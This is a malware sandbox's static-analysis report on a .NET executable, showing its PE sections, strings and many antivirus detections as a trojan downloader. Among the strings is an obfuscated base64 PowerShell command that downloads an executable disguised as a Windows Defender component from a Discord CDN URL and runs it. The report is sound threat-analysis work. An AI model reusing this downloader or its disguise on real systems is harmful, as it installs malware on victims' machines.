popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2023-01-19 18:24:51

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00000c14 0x00000e00 3.5545291401
.rsrc 0x00004000 0x00000578 0x00000600 4.24264838289
.reloc 0x00006000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000040a0 0x0000022c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000042d0 0x000002a2 LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, ASCII text

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
zufhegyujdkylrftklnmidcfiktkuxdp
mscorlib
System
Object
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
System.Diagnostics
ProcessStartInfo
set_FileName
set_Arguments
ProcessWindowStyle
set_WindowStyle
set_CreateNoWindow
Process
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8" ?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity version="8.2.6.8" name="wvhddqtcrlajhgxztahzpsblhpyjmhyvi" />
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</asmv1:assembly>
powershell
-EncodedCommand "PAAjAGUAZAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA1ADUANQA5ADkAMgAwADAANgA3ADQAOAAxADYAMgAwAC8AMQAwADYANQA1ADYAMAA2ADkAMwAyADkANQA4ADEAMgA2ADYAOAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAHQAcgBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB5AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQB1AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANwAuAGUAeABlACcAKQApADwAIwB1AGgAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGUAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB2AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANwAuAGUAeABlACcAKQA8ACMAZQBqAHgAIwA+AA=="
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
LegalCopyright
OriginalFilename
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Clean
tehtris Clean
MicroWorld-eScan Gen:Variant.Marsilia.2083
FireEye Generic.mg.bea17f1ca9914a35
CAT-QuickHeal Clean
McAfee Artemis!BEA17F1CA991
Malwarebytes Trojan.Downloader.MSIL.Generic
Sangfor Clean
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Variant.Marsilia.2083
K7GW Clean
K7AntiVirus Trojan-Downloader ( 00593c201 )
Arcabit Trojan.Marsilia.D823
Baidu Clean
VirIT Trojan.Win32.Genus.NGS
Cyren W32/MSIL_Agent.DIE.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.MAE
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSIL.PsDownload.gen
Alibaba TrojanDownloader:MSIL/AsyncRat.c2217725
NANO-Antivirus Clean
ViRobot Clean
Rising Downloader.PsDownload!8.E547 (CLOUD)
Sophos Clean
F-Secure Trojan.TR/Dldr.Agent.fsbku
DrWeb Clean
VIPRE Gen:Variant.Marsilia.2083
TrendMicro TROJ_GEN.R002C0DAL23
Trapmine Clean
CMC Clean
Emsisoft Clean
SentinelOne Static AI - Malicious PE
Jiangmin Clean
Webroot W32.Trojan.MSIL.PsDownload
Avira TR/Dldr.Agent.fsbku
MAX malware (ai score=86)
Antiy-AVL Trojan[Downloader]/MSIL.PsDownload
Kingsoft Clean
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Malware@#3rcwp9f6u2b12
Microsoft Trojan:MSIL/AsyncRat.NEAG!MTB
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.MSIL.PsDownload.gen
GData Win32.Trojan-Downloader.Generic.KV7LEH
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5148890
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.36212.am0@ae9S0Dp
ALYac Gen:Variant.Marsilia.2083
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Msil.Trojan-Downloader.Ader.Mgil
Yandex Clean
Ikarus Trojan.MSIL.CoinMiner
MaxSecure Clean
Fortinet MSIL/Agent.MAE!tr
AVG Win32:Trojan-gen
Avast Win32:Trojan-gen
No IRMA results available.